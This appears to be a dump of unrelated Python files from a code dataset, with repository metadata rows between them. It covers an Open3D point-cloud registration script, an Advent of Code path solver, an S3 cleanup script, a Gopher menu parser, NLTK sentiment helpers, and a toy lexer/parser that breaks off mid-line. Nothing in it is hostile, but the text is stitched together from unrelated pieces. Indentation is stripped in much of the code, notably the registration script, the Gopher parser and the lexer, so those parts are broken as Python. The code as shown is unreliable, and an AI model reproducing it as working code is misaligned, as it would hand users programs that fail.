source_down = source.voxel_down_sample(voxel_size = r)
target_down = target.voxel_down_sample(voxel_size = r)
source_down.estimate_normals( search_param=o3d.geometry.KDTreeSearchParamHybrid(radius = r * 2, max_nn = 30))
target_down.estimate_normals( search_param=o3d.geometry.KDTreeSearchParamHybrid(radius = r * 2, max_nn = 30))
result_icp = o3d.pipelines.registration.registration_colored_icp(target_down, source_down,
r, current_transformation,
o3d.pipelines.registration.TransformationEstimationForColoredICP(),
o3d.pipelines.registration.ICPConvergenceCriteria(
relative_fitness=1e-8, relative_rmse=1e-8, max_iteration=iter))
current_transformation = result_icp.transformation
if len(np.asarray(result_icp.correspondence_set))> 1000:
Matched = True
if Filename not in keyframe_ids:
keyframe_ids.append(Filename)
keyframe_ids.append(Filename+interval)
Filename += interval
continue
elif interval - SEG_INTERVAL < SEG_INTERVAL:
Matched = True
if Filename not in keyframe_ids:
keyframe_ids.append(Filename)
keyframe_ids.append(Filename+interval)
Filename += interval
continue
else:
Matched = False
    except:
        # loading past the last available frame raises; treat that as the
        # end of the sequence
        return keyframe_ids
def load_sources(path, keyframe_ids):
"""
    load segmented color images, depth readings, and pointclouds (unsampled
    and downsampled) at the specified keyframes
"""
global voxel_size
cads = []
depths = []
pcds= []
pcds_down = []
num_frames = len(glob.glob1(path + "cad","*.jpg"))
for Filename in keyframe_ids:
        # note: load_colordepth returns (segmented, depth, pointcloud); the
        # original variable names are kept below, so 'mask' holds the depth
        # image and 'depth' holds the pointcloud
        segmented, mask, depth = load_colordepth(path,Filename)
cads.append(segmented)
depths.append(depth)
color_gray = cv2.cvtColor(segmented, cv2.COLOR_BGR2GRAY)
color_gray[mask == 0] = 0
mask = color_gray
source = o3d.geometry.PointCloud()
source.points = o3d.utility.Vector3dVector(depth[mask>0])
source.colors = o3d.utility.Vector3dVector(segmented[mask>0])
# o3d.visualization.draw_geometries([source])
pcds.append(source)
pcd_down = source.voxel_down_sample(voxel_size = voxel_size)
pcd_down.estimate_normals(o3d.geometry.KDTreeSearchParamHybrid(radius = 0.002 * 2, max_nn = 30))
pcds_down.append(pcd_down)
return (cads,depths,pcds,pcds_down)
def nearest_neighbour(a, b):
"""
find the nearest neighbours of a in b using KDTree
Parameters
----------
a : (n, ) numpy.ndarray
b : (n, ) numpy.ndarray
Returns
----------
    dist : n float
        Euclidean distance of the closest neighbour in b to a
    index : n float
        The index of the closest neighbour in b to a in terms of Euclidean distance
"""
tree = KDTree(b)
dist, index = tree.query(a)
return (dist, index)
def print_usage():
print( "Usage: registerwithkeyframes.py <path>")
print( "path: [data_path]/all or name of the folder")
print( "e.g., registerwithkeyframes.py Data/all, registerwithkeyframes.py Data_new/all, "
"registerwithkeyframes.py Data/Cheezit")
if __name__ == "__main__":
try:
if sys.argv[1][-3:] == "all":
folders = glob.glob(sys.argv[1][:-3]+"*/")
elif sys.argv[1]+"/" in glob.glob("Data_new/*/") \
or sys.argv[1]+"/" in glob.glob("Data/*/")\
or sys.argv[1]+"/" in glob.glob("Data_stuck/*/"):
folders = [sys.argv[1]+"/"]
else:
print_usage()
exit()
except:
print_usage()
exit()
print("SEG_METHOD ", SEG_METHOD)
print("RECON_METHOD ",RECON_METHOD)
for path in folders:
print(path)
print("select key frames ...")
exist = os.path.isfile(path + "keyframe_ids.csv")
if exist:
with open(path + "keyframe_ids.csv", 'r') as f:
reader = csv.reader(f)
keyframe_ids = [row[0] for row in reader]
keyframe_ids = list(map(int, keyframe_ids[1:]))
else:
keyframe_ids = select_keyframes(path)
key = pd.DataFrame({'keyframe_ids': np.array(keyframe_ids, dtype=int)})
key.to_csv(path + 'keyframe_ids.csv', index=False)
# keyframe_ids = list(range(1,1205,5))
print("Load pointclouds ...")
cads,depths,originals,pcds_down = load_sources(path, keyframe_ids)
print("Full registration ...")
if RECON_METHOD == "robot-joints":
LinkOrientations, LinkPositions = load_robot_joints(path, keyframe_ids)
ObjectOrientations, ObjectPositions = load_object_states(path, keyframe_ids)
pose_graph = joints_full_registration(pcds_down, LinkOrientations, LinkPositions)
# pose_graph = joints_full_registration(pcds_down, ObjectOrientations, ObjectPositions)
else:
pose_graph = full_registration(pcds_down, cads, depths,
max_correspondence_distance_coarse,
max_correspondence_distance_fine)
print("Optimizing PoseGraph ...")
option = o3d.pipelines.registration.GlobalOptimizationOption(
max_correspondence_distance = max_correspondence_distance_fine,
edge_prune_threshold = 0.25,
reference_node = 0)
o3d.pipelines.registration.global_optimization(pose_graph,
o3d.pipelines.registration.GlobalOptimizationLevenbergMarquardt(),
o3d.pipelines.registration.GlobalOptimizationConvergenceCriteria(), option)
print( "Merge segments")
for point_id in trange(len(originals)):
originals[point_id].transform(pose_graph.nodes[point_id].pose)
print("Apply post processing")
points, colors, vote = post_process(originals, voxel_Radius, inlier_Radius)
ply = Ply(points[vote>1], colors[vote>1])
pg = pd.DataFrame({'PoseGraph': pose_graph}, index=[0])
pg.to_csv(os.path.join(path, "pose_graph.csv"))
meshfile = '%s.ply' % (path[:-1]+'_'+SEG_METHOD+'_'+RECON_METHOD)
ply.write(meshfile)
print("Mesh saved")
        # Surface_reconstruction_screened_poisson & remove_statistical_outlier
if WATERTIGHT_POLYGON_MESH:
pcd = o3d.io.read_point_cloud(meshfile)
cl, ind = pcd.remove_statistical_outlier(nb_neighbors=30,
std_ratio=2.0)
output_path = os.path.join(os.getcwd(),meshfile.split('.')[0] + "_filtered.ply")
o3d.io.write_point_cloud(output_path, cl)
pcd = surface_reconstruction_screened_poisson(output_path)
coordinate = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.5, origin=[0, 0, 0])
o3d.visualization.draw_geometries([pcd, coordinate])
else:
coordinate = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.5, origin=[0, 0, 0])
o3d.visualization.draw_geometries([o3d.io.read_point_cloud(meshfile),coordinate])
pass
| 39.553982 | 143 | 0.629363 | 2,618 | 22,348 | 5.174561 | 0.167685 | 0.02436 | 0.033661 | 0.017126 | 0.449472 | 0.398908 | 0.375729 | 0.3245 | 0.308039 | 0.281465 | 0 | 0.019779 | 0.273805 | 22,348 | 564 | 144 | 39.624113 | 0.814961 | 0.192724 | 0 | 0.301493 | 0 | 0 | 0.040479 | 0.006671 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035821 | false | 0.002985 | 0.056716 | 0 | 0.125373 | 0.047761 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df820b00fafa8e7fb9f86f007a0a19a6003fd3fb | 803 | py | Python | advent-of-code/2021/day-15-part-1.py | scorphus/sparring | 6e53d81f2db39df58561a7fd941d73090712ba52 | [
"MIT"
] | 2 | 2017-01-06T15:32:50.000Z | 2020-04-16T20:56:02.000Z | advent-of-code/2021/day-15-part-1.py | scorphus/sparring | 6e53d81f2db39df58561a7fd941d73090712ba52 | [
"MIT"
] | null | null | null | advent-of-code/2021/day-15-part-1.py | scorphus/sparring | 6e53d81f2db39df58561a7fd941d73090712ba52 | [
"MIT"
] | null | null | null | import heapq
with open("day-15.txt") as f:
    lines = f.read().rstrip().splitlines()
graph = {}
for i, row in enumerate(lines):
for j, n in enumerate(row):
graph[i, j] = int(n)
DELTAS = (
(0, 1),
(1, 0),
(-1, 0),
(0, -1),
)
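# Dijkstra over the grid: always expand the lowest-total-risk cell next.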
def find_lowest_risk(graph, start, end):
    queue = [(0, *start)]
    seen = set()
    while queue:
        risk, i, j = heapq.heappop(queue)
        # settle each cell when it is popped, not when it is pushed;
        # marking on push could lock in a non-minimal risk for a cell
        if (i, j) in seen:
            continue
        seen.add((i, j))
        if (i, j) == end:
            return risk
        for di, dj in DELTAS:
            ni, nj = i + di, j + dj
            if (ni, nj) in graph and (ni, nj) not in seen:
                heapq.heappush(queue, (risk + graph[ni, nj], ni, nj))
size = len(lines)
end = size - 1, size - 1
risk = find_lowest_risk(graph, (0, 0), end)
print(risk)
| 21.702703 | 69 | 0.506849 | 124 | 803 | 3.25 | 0.395161 | 0.059553 | 0.069479 | 0.094293 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027726 | 0.326276 | 803 | 36 | 70 | 22.305556 | 0.71719 | 0 | 0 | 0 | 0 | 0 | 0.012453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.034483 | 0 | 0.103448 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df85135a7ca551c37959030d0ede868200ce2534 | 1,621 | py | Python | mycleanup.py | azam-a/newdeployments | eb23fa35f2c200b9726760e70a36e95ba277478f | [
"MIT"
] | null | null | null | mycleanup.py | azam-a/newdeployments | eb23fa35f2c200b9726760e70a36e95ba277478f | [
"MIT"
] | null | null | null | mycleanup.py | azam-a/newdeployments | eb23fa35f2c200b9726760e70a36e95ba277478f | [
"MIT"
] | null | null | null |
import re
from mydeploy import (
get_file_objects,
S3Util,
)
from environment_config import (
AWS_CONFIG_PATH,
AWS_PROFILE,
CSS_BUCKET,
IMAGE_BUCKET,
JS_BUCKET,
CSS_PREFIX,
IMAGE_PREFIX,
JS_PREFIX,
XML_PATH
)
def cleanup_main():
c = S3Util.create_connection_pools(AWS_CONFIG_PATH, AWS_PROFILE,
CSS_BUCKET, JS_BUCKET, IMAGE_BUCKET)
existing_versioned_files_in_xml = get_file_objects(c, XML_PATH)
keys_in_xml = [item.versioned_path_in_bucket for item
in existing_versioned_files_in_xml]
for bucket in [
(c['css_bucket'], CSS_PREFIX),
(c['js_bucket'], JS_PREFIX),
(c['image_bucket'], IMAGE_PREFIX)]:
keys_matching_pattern = get_all_matching_keys(bucket[0], bucket[1])
for key_ in keys_matching_pattern:
if (key_.key in keys_in_xml):
print('Skipping deletion of http://' + bucket[0].name +
'.s3.amazonaws.com/' + key_.key +
', currently indexed in XML file \n')
else:
key_.delete()
print('Deleted http://' + bucket[0].name +
'.s3.amazonaws.com/' + key_.key + '\n')
def get_all_matching_keys(bucket, prefix_=None):
return [item for item in bucket.list(prefix=prefix_)
if is_matching_versioned_pattern(item.key)]
def is_matching_versioned_pattern(path):
    # raw string avoids Python's invalid-escape-sequence warning
    return bool(re.search(r'/(.*-\d{12}\..*$)', path))
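# e.g. (assumed key layout): "css/app-202401150930.css" matches the
# 12-digit versioned pattern above, while "css/app.css" does not.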
if __name__ == '__main__':
cleanup_main()
| 25.730159 | 75 | 0.587909 | 196 | 1,621 | 4.464286 | 0.321429 | 0.028571 | 0.032 | 0.036571 | 0.269714 | 0.153143 | 0.153143 | 0.08 | 0.08 | 0 | 0 | 0.008889 | 0.305984 | 1,621 | 62 | 76 | 26.145161 | 0.768889 | 0 | 0 | 0 | 0 | 0 | 0.106173 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0 | 0.069767 | 0.046512 | 0.186047 | 0.046512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df867ad23e683b9a9e6885db5e7d9658c76ccb74 | 4,276 | py | Python | menu.py | ateesdalejr/gseepy | 696b415b1eba9cf1e44ec3b84aff5fcabd12e26e | [
"MIT"
] | null | null | null | menu.py | ateesdalejr/gseepy | 696b415b1eba9cf1e44ec3b84aff5fcabd12e26e | [
"MIT"
] | null | null | null | menu.py | ateesdalejr/gseepy | 696b415b1eba9cf1e44ec3b84aff5fcabd12e26e | [
"MIT"
] | null | null | null | import sys
class DirEntity:
def __init__(self, type_char, user_name, selector, host, port):
self.type = type_char
self.user_name = user_name
self.selector = selector
self.host = host
self.port = port
def __eq__(self, other):
if type(other) != type(self): return False
if self.type != other.type: return False
if self.user_name != other.user_name: return False
if self.selector != other.selector: return False
if self.host != other.host: return False
if self.port != other.port: return False
return True
def __str__(self):
return str((self.type, self.user_name, self.selector, self.host, self.port))
def __repr__(self):
return self.__str__()
class Parser:
"""
Parses Gopher menus into DirEntity objects.
"""
def __init__(self, text):
self._text = text
self._i, self._char = -1, None
self._get_char()
def _get_char(self):
"""
        Get a character and store it in self._char; stores -1 once it reads past the end of the text.
"""
self._i += 1
if self._i < len(self._text):
self._char = self._text[self._i]
else:
self._char = -1
def _error(self, msg):
print(f"error: {msg}", file = sys.stderr) # put error here for match failure
sys.exit(-1)
def _match(self, c):
buf = ""
while self._char != -1 and len(c) > len(buf):
buf += self._char
self._get_char()
if c != buf:
c, buf = repr(c), repr(buf)
self._error(f"expected {c} not {buf}")
def _grab_type(self):
"""
Grabs a single type character and returns it.
"""
c = self._char
if not c in "0123456789+TgI" + "ih":
c = repr(c)
self._error(f"unknown type {c}")
self._get_char()
return c
def _grab_unascii(self):
"""
Grabs an ascii string that doesn't include NUL, Tab or CR-LF.
"""
unascii = ""
while self._char != -1 and not self._char in "\x00\t\r\n":
unascii += self._char
self._get_char()
return unascii
def _grab_host(self):
"""
Parses a host and returns it.
"""
host = ""
while True:
while self._char != -1 and not self._char in ".\x00\t\r\n":
host += self._char
self._get_char()
if self._char == ".":
host += "."
self._get_char()
else:
break
return host
def _grab_port(self):
"""
        Parses a port and returns an integer. If there is no port, it raises an error.
"""
port = ""
while self._char != -1 and self._char in "0123456789":
port += self._char
self._get_char()
if len(port) == 0:
self._error("port empty")
return int(port)
def _parse_dir(self):
"""
Parses a single directory entity and returns a new DirEntity object.
"""
type_char = self._grab_type()
user_name = self._grab_unascii() #This gets the user_name field for the DirEntity
self._match("\t")
selector = self._grab_unascii() #This gets the selector.
self._match("\t")
host = self._grab_host()
self._match("\t")
port = self._grab_port()
self._match("\r\n")
return DirEntity(type_char, user_name, selector, host, port)
def parse(self):
"""
Returns a list of DirEntity objects.
"""
dirs = []
# TODO implement correct handling of periods and lastline pattern
while self._char != -1 and self._char != ".":
dirs.append(self._parse_dir())
return dirs
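# A Gopher menu line (per RFC 1436) has the tab-separated form that
# _parse_dir() above expects:
#   <type char><user name>\t<selector>\t<host>\t<port>\r\n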
def run_tests():
"""
Runs tests on the MenuParser class.
"""
p = Parser(b"0About prices\tPrices/aboutus\tserver.example.com\t70\r\n".decode("ascii"))
print(p._parse_dir())
if __name__ == "__main__":
run_tests()
| 30.326241 | 93 | 0.520814 | 527 | 4,276 | 3.994307 | 0.252372 | 0.072209 | 0.029929 | 0.04038 | 0.160095 | 0.142993 | 0.088361 | 0.034204 | 0.034204 | 0.034204 | 0 | 0.013658 | 0.366464 | 4,276 | 140 | 94 | 30.542857 | 0.763381 | 0.151544 | 0 | 0.125 | 0 | 0 | 0.057698 | 0.015184 | 0 | 0 | 0 | 0.007143 | 0 | 1 | 0.15625 | false | 0 | 0.010417 | 0.020833 | 0.28125 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df89b374617f742546d6eb7e0fd0ae663bedfddc | 5,265 | py | Python | 06-learning-to-classify-text/util/data_util.py | SolangeUG/nltk-book | 05051325a64836ae5c89d18f3c2145e9a6c4f0ae | [
"Apache-2.0"
] | 2 | 2018-08-05T15:50:12.000Z | 2019-01-24T05:52:02.000Z | 06-learning-to-classify-text/util/data_util.py | SolangeUG/nltk-book | 05051325a64836ae5c89d18f3c2145e9a6c4f0ae | [
"Apache-2.0"
] | null | null | null | 06-learning-to-classify-text/util/data_util.py | SolangeUG/nltk-book | 05051325a64836ae5c89d18f3c2145e9a6c4f0ae | [
"Apache-2.0"
] | null | null | null | import os
import gzip
import json
import numpy
import urllib.request
from nltk.sentiment.util import mark_negation
from nltk.corpus import stopwords, opinion_lexicon
from nltk.tokenize import sent_tokenize, word_tokenize
def download_data(dataset_name, directory_name):
"""
Download a given dataset name into a given directory
:param dataset_name: input dataset name
:param directory_name: input directory name
:return: None
"""
filename = 'reviews_%s_5.json' % dataset_name
filepath = os.path.join(directory_name, filename)
if os.path.exists(filepath):
print("Dataset %s has already been downloaded to %s" % (dataset_name, directory_name))
else:
url = 'http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/%s.gz' % filename
urllib.request.urlretrieve(url, filepath + ".gz")
with gzip.open(filepath + ".gz", 'rb') as fin:
with open(filepath, 'wb') as fout:
fout.write(fin.read())
print("Downloaded dataset %s and saved it to %s" % (dataset_name, directory_name))
def load_data(dataset_name, directory_name):
"""
Load data in JSON format into memory
:param dataset_name: input dataset name
:param directory_name: input directory name
:return:
"""
filepath = os.path.join(directory_name, 'reviews_%s_5.json' % dataset_name)
if not os.path.exists(filepath):
download_data(dataset_name, directory_name)
data = []
with open(filepath, 'r') as f:
        for line in f:  # read file line by line
            # NB: str hashes are salted per process in Python 3, so the
            # partition below differs between runs unless PYTHONHASHSEED is fixed
            item_hash = hash(line)  # we will use this later for partitioning our data
            item = json.loads(line)  # convert JSON string to Python dict
            item['hash'] = item_hash  # add hash for identification purposes
            data.append(item)
print("Loaded %d data for dataset %s" % (len(data), dataset_name))
return data
def partition_train_validation_test(data):
"""
Partition a dataset into a training set, a validation set and a testing set
:param data: input dataset
:return: training, validation and testing set
"""
# 60% : modulus is 0, 1, 2, 3, 4, or 5
data_train = [item for item in data if item['hash'] % 10 <= 5]
# 20% : modulus is 6 or 7
data_valid = [item for item in data if item['hash'] % 10 in [6, 7]]
# 20% : modulus is 8 or 9
data_test = [item for item in data if item['hash'] % 10 in [8, 9]]
return data_train, data_valid, data_test
def tokenize_with_negation(text):
"""
Split a text into lower-case tokens, removing all punctuation tokens and stopwords
:param text: input text
:return: lowercase word tokens, without punctuation or stopwords
"""
# List of stop words in English
english_stopwords = set(stopwords.words('english'))
# Set of negated stopwords
negated_stopwords = set(word + "_NEG" for word in english_stopwords)
# List of all stopwords, including negated words
all_stopwords = english_stopwords.union(negated_stopwords)
tokens = []
for sent in sent_tokenize(text):
pretokens = word_tokenize(sent.lower())
# exclude punctuation
pretokens = [token for token in pretokens if any(char.isalpha() for char in token)]
# exclude negated stop words (tagged as negated)
pretokens = mark_negation(pretokens)
tokens.extend(token for token in pretokens if token not in all_stopwords)
return tokens
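# A minimal sketch of the negation marking (toy sentence, assumed output):
#   tokenize_with_negation("The plot was not good.")
#   -> ['plot', 'good_NEG']   # tokens after "not" get the _NEG suffix,
#                             # and (negated) stopwords are dropped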
def pos_neg_fraction_with_negation(text):
"""
Compute the fraction of positive and negative words in a text, including negated words
:param text: input text
:return: a fraction of positive and negative words in the text
"""
# Sets of already known positive and negative words
positive_words = set(opinion_lexicon.positive())
negative_words = set(opinion_lexicon.negative())
# Set of all positive words including negated negative words
all_positive_words = positive_words.union({tag + "_NEG" for tag in negative_words})
# Set of all positive words including negated positive words
all_negative_words = negative_words.union({tag + "_NEG" for tag in positive_words})
tokens = tokenize_with_negation(text)
# count how many positive and negative words occur in the text
count_pos, count_neg = 0, 0
for token in tokens:
if token in all_positive_words:
count_pos += 1
if token in all_negative_words:
count_neg += 1
count_all = len(tokens)
if count_all != 0:
return count_pos/count_all, count_neg/count_all
else: # avoid division by zero
return 0., 0.
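# e.g. (assumed toy input): pos_neg_fraction_with_negation("not good")
# keeps only ['good_NEG'], which counts as negative -> (0.0, 1.0)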
def dataset_to_targets(data):
"""
Convert training dataset to target vector
:param data:
:return:
"""
return numpy.array([item['overall'] for item in data])
def dataset_to_matrix_with_negation(data):
"""
Convert training dataset (with negation) into a matrix
:param data: training dataset
:return: matrix representation of training dataset
"""
# assuming the training dataset has a 'reviewText' key
return numpy.array([list(pos_neg_fraction_with_negation(item['reviewText'])) for item in data])
| 38.430657 | 100 | 0.677113 | 723 | 5,265 | 4.795297 | 0.24758 | 0.041246 | 0.028843 | 0.034612 | 0.24488 | 0.207961 | 0.124892 | 0.068936 | 0.068936 | 0.060571 | 0 | 0.00898 | 0.238557 | 5,265 | 136 | 101 | 38.713235 | 0.855824 | 0.318898 | 0 | 0.028571 | 0 | 0 | 0.082083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.114286 | 0 | 0.314286 | 0.042857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8a5491c4a53b67677666f587efabbb177459a7 | 12,698 | py | Python | mdrparser.py | tringcooler/MODRON | c0cac79d1d008ffc51d9caf44f1cd299ca586682 | [
"MIT"
] | null | null | null | mdrparser.py | tringcooler/MODRON | c0cac79d1d008ffc51d9caf44f1cd299ca586682 | [
"MIT"
] | null | null | null | mdrparser.py | tringcooler/MODRON | c0cac79d1d008ffc51d9caf44f1cd299ca586682 | [
"MIT"
] | null | null | null | #! python3
# coding: utf-8
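# Pipeline sketch: c_lexer turns raw text into (type, value) tokens,
# c_parser drives a state machine over those tokens to build c_progs,
# and c_progs runs the compiled programs.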
KLX_CMT = '#'
KLX_NL = '\n'
KW_LBL = ':'
KW_SPL = '/'
KW_BR1 = '('
KW_BR2 = ')'
PRMTCH = lambda s, d: len(s) >= len(d) and s[:len(d)] == d
class err_lexer(Exception):
pass
class err_syntax(Exception):
pass
class c_lexer:
def __init__(self, raw):
self.raw = raw
self.ridx = 0
self.stat = 'idle'
self.buf = ''
self.bpos = (1, 1)
self.cpos = (1, 1)
@property
def pos(self):
return self.bpos
def gc(self, peek = False):
i = self.ridx
if i >= len(self.raw):
return ''
c = self.raw[i]
if not peek:
self.ridx += 1
prow, pcol = self.cpos
if c == KLX_NL:
prow += 1
pcol = 0
pcol += 1
self.cpos = (prow, pcol)
return c
def rerr(self, e):
raise err_lexer(f'(ln:{self.cpos[0]} col:{self.cpos[1]}) {e}')
def parse(self):
while self.stat != 'end':
r = self.p1()
if r:
yield r
def p1(self):
r = self.pr_all()
if r:
return r
mtd = getattr(self, 'p_' + self.stat)
return mtd()
def pr_all(self):
c = self.gc(True)
if c == KLX_CMT:
r = ''
while c and c != KLX_NL:
self.gc()
r += c
c = self.gc(True)
return ('comment', r)
def p_idle(self):
self.bpos = self.cpos
c = self.gc()
if not c:
self.stat = 'end'
return ('eof', None)
elif c.isalpha() or c == '_':
self.buf += c
self.stat = 'word'
elif c.isdigit() or c == '-':
self.buf += c
self.stat = 'digit'
elif c.isspace():
if c == KLX_NL:
return ('newline', None)
elif c.isascii():
return ('symbol', c)
else:
self.rerr(f'invalid lex: {c}')
def p_word(self):
c = self.gc(True)
if c.isalpha() or c.isdigit() or c == '_':
self.buf += c
self.gc()
else:
buf = self.buf
self.buf = ''
self.stat = 'idle'
return ('word', buf)
def p_digit(self):
c = self.gc(True)
if c.isdigit():
self.buf += c
self.gc()
else:
buf = self.buf
self.buf = ''
self.stat = 'idle'
return ('digit', int(buf))
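# e.g. (assumed source text "foo: 1"): c_lexer.parse() yields
# ('word', 'foo'), ('symbol', ':'), ('digit', 1), then ('eof', None).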
class c_parser:
def __init__(self, lexer, cmplr):
self.lx = lexer
self.cp = cmplr
self.reset()
def reset(self):
self.lxit = self.lx.parse()
self.curlx = (None, None)
self.la1lx = (None, None)
self.ntok()
self.ntok()
self.stat = 'idle'
self.ststk = []
self.ctxs = {}
self.progs = c_progs(self.cp)
self.cprog = None
@property
def pos(self):
return self.curlx[1]
@property
def ctok(self):
return self.curlx[0]
@property
def la1tok(self):
return self.la1lx[0]
def ntok(self):
self.curlx = self.la1lx
try:
self.la1lx = (next(self.lxit), self.lx.pos)
except StopIteration:
pass
def rerr(self, e):
raise err_syntax(f'(ln:{self.pos[0]} col:{self.pos[1]}) {e}')
def stgo(self, st):
ost = self.stat
if ost != st and ost in self.ctxs and not ost in self.ststk:
del self.ctxs[ost]
self.stat = st
def stpush(self):
self.ststk.append(self.stat)
def stpop(self):
if len(self.ststk) == 0:
self.rerr('unbalance stat')
self.stgo(self.ststk.pop())
def stback(self, bi):
if bi > len(self.ststk) or bi <= 0:
self.rerr('invalid ctx rel index')
return self.ststk[-bi]
def stctx(self, st = None):
if st is None:
st = self.stat
elif isinstance(st, int):
st = self.stback(st)
if not st in self.ctxs:
self.ctxs[st] = {}
return self.ctxs[st]
def chksym(self, c, la1 = True):
if la1:
tt, tv = self.la1tok
else:
tt, tv = self.ctok
return tt == 'symbol' and tv == c
def parse(self):
while self.stat != 'done':
self.p1()
return self.progs
def p1(self):
self.pr_all()
mtd = getattr(self, 'p_' + self.stat)
return mtd()
def pr_all(self):
tt, tv = self.ctok
while tt == 'comment':
self.ntok()
tt, tv = self.ctok
def p_idle(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.cprog = tv
self.stgo('labeled')
self.ntok()
self.ntok()
elif tt == 'eof':
self.stgo('done')
else:
self.rerr(f'invalid label: {tv}')
def p_labeled(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.stgo('idle')
elif tt == 'eof':
self.stgo('idle')
elif tt == 'word':
if not self.progs.seq(self.cprog):
self.rerr(f'redefined prog: {tv}')
self.stgo('sequence')
else:
if not self.progs.prog(self.cprog):
self.rerr(f'redefined prog: {tv}')
self.stgo('prog')
def p_sequence(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.stgo('idle')
elif tt == 'eof':
self.stgo('idle')
elif tt == 'word' and self.chksym(KW_BR1):
self.stgo('func')
elif tt == 'word':
if not self.progs.has(tv):
self.rerr(f'undefined prog name: {tv}')
self.progs.add(self.cprog, lambda s: (s.append(tv), s)[1])
self.ntok()
else:
self.rerr(f'invalid prog name: {tv}')
def p_func(self):
tt, tv = self.ctok
if tt == 'word' and self.chksym(KW_BR1):
ctx = self.stctx()
ctx['name'] = tv
ctx['args'] = []
self.stpush()
self.stgo('argseq')
self.ntok()
self.ntok()
elif self.chksym(KW_BR2, False):
ctx = self.stctx()
func = (ctx['name'], ctx['args'])
if not self.progs.get_builtin(func):
self.rerr(f'unknown builtin func: {func[0]}({len(func[1])})')
self.progs.add(self.cprog, lambda s: (s.append(func), s)[1])
self.stgo('sequence')
self.ntok()
else:
self.rerr(f'invalid function: {tv}')
def p_argseq(self):
tt, tv = self.ctok
if tt == 'word' or tt == 'digit':
ctx = self.stctx('func')
ctx['args'].append(tv)
if self.chksym(KW_BR2):
self.stpop()
self.ntok()
elif self.chksym(KW_BR2, False):
self.stpop()
else:
self.rerr(f'invalid argument: {tv}')
def p_prog(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.stgo('idle')
elif tt == 'eof':
self.stgo('idle')
else:
self.stgo('condi')
def p_pair(self):
tt, tv = self.ctok
if tt == 'digit':
sctx = self.stctx()
dctx = self.stctx(1)
if not 'seq' in dctx:
dctx['seq'] = []
dctx['seq'].append((sctx['1st'], tv))
self.stpop()
self.ntok()
else:
self.rerr(f'invalid pair: {tv}')
def p_condi(self):
tt, tv = self.ctok
if tt == 'digit' and self.chksym(KW_LBL):
ctx = self.stctx('pair')
ctx['1st'] = tv
self.stpush()
self.stgo('pair')
self.ntok()
self.ntok()
elif self.chksym(KW_SPL, False):
ctx = self.stctx()
if 'seq' in ctx:
condi = ctx['seq']
else:
condi = []
self.progs.add(self.cprog, lambda cp: cp.c(*condi))
self.stgo('opr')
self.ntok()
else:
self.rerr(f'invalid condition: {tv}')
def p_opr(self):
tt, tv = self.ctok
if tt == 'digit' and self.chksym(KW_LBL):
ctx = self.stctx('pair')
ctx['1st'] = tv
self.stpush()
self.stgo('pair')
self.ntok()
self.ntok()
elif tt == 'newline' or tt == 'eof':
ctx = self.stctx()
if 'seq' in ctx:
opr = ctx['seq']
else:
opr = []
self.progs.add(self.cprog, lambda cp: cp.t(*opr))
self.stgo('prog')
if tt != 'eof':
self.ntok()
else:
self.rerr(f'invalid operator: {tv}')
class c_progs:
def __init__(self, cmplr):
self.cp = cmplr
self.progs = {}
self.clog = []
self.log = []
self.obuf = []
def has(self, name):
return name in self.progs
def get_builtin(self, func_itm):
name, args = func_itm
mtd = None
mname = 'builtin_' + name + '_' + str(len(args))
if hasattr(self, mname):
r = getattr(self, mname)
if callable(r):
mtd = r
return mtd
def add(self, name, cb = None):
if not name in self.progs:
raise KeyError(f'invalid prog name: {name}')
if callable(cb):
self.progs[name] = cb(self.progs[name])
def prog(self, name):
if name in self.progs:
return False
self.progs[name] = self.cp
return True
def seq(self, name):
if name in self.progs:
return False
self.progs[name] = []
return True
def _run(self, name):
if not name in self.progs:
raise KeyError(f'invalid prog name: {name}')
prog = self.progs[name]
log = self.clog
if isinstance(prog, list):
log.append(f'seq {name}')
seq = prog
r = None
for p in seq:
if isinstance(p, tuple):
bfunc, args = p
mtd = self.get_builtin(p)
                    if not mtd:
                        # c_progs has no rerr(); raise the error directly
                        raise err_syntax(
